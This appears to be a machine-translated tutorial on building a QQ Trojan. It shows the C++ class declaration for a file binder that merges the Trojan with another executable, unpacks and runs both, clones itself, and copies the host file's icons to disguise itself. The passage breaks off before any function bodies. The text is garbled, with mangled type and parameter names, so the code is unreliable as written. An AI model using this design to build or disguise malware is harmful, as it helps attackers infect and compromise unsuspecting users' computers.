Do it yourself to do QQ Trojan - file bindings
In this article I will analyze the implementation details of the CBINDFILE class in detail.
Let's take a look at the statement of the CBINDFILE class!
Class CBindfile: Public COBJECT
{
PUBLIC:
CBINDFILE ();
Virtual ~ cbindfile ();
Static const char * const Szflag; // File is bound to
Static const unsigned int LENORIGIN; // The file size when the unbound dynamic connection library
Static const unsigned int LENORIGINADDDLL; // Binds the // file size after the dynamic connection library
Private:
TCHAR MY_NAME [MAX_PATH]; // Self-file name
Tchar SzmyFilePath [MAX_PATH]; // Self-file path
Handle HfileMyself; // self file handle
BYTE * BUF; // Read file data buffer
CString StrtObindFilePath; / / Save the file name to be bound
CString strfinalFilePath; / / Save the final synthesis file name
Char m_ext [4]; // Save the extension of the bound file
CSTRING STRUNBINDFILEPATH_DLL; // Decomposed DLL file name
CString strunbindfilepath_sec; // Decomposed SEC file name
Process_information pirunproc; // Decompose the second file run // process information
PUBLIC:
BOOL INITIATE (); // Judgment file is binding or decomposition
Bool clonemyself_and_run (); // Clone an original file and runs it
/ / Get the process information of the decomposition of the file
VoidgetrunfileProcessInfo (Process_information & Pi) Const;
CSTRING GETSECFILEPATH () Const;
Private:
BOOL unbind_and_run (); // Decompose the merged file, running them
Bool bind_file (); // Bind himself and another file
// Process when creating an decomposition file
Bool Create_Process (const char * temp_run, bool bdirectrun);
/ / Judgment is the name of the specified file
Bool IsspecFileName (const tchar * const szspecfilename) Const;
Void Modify_myicon (Byte * & Buf); / / Modify all the icons in your own file
/ / Find the icon that matches your own file in the bound PE file
BYTE * FIND_MATCH_ICON (HModule HexetObind, Const Resdir * PRESDIR);
// Enumerate the callback function of the icon
Static Bool Callback EnumiconProc (HModule Hexe,
LPCTSTR LPSZTYPE,
LPTSTSTSZZNAME,
Lparam lparam;
}
The three functions related to the icon are temporarily not introduced, leave detailed instructions in the back of the snap icon. Let's explain several important member functions
1. Itisate ()
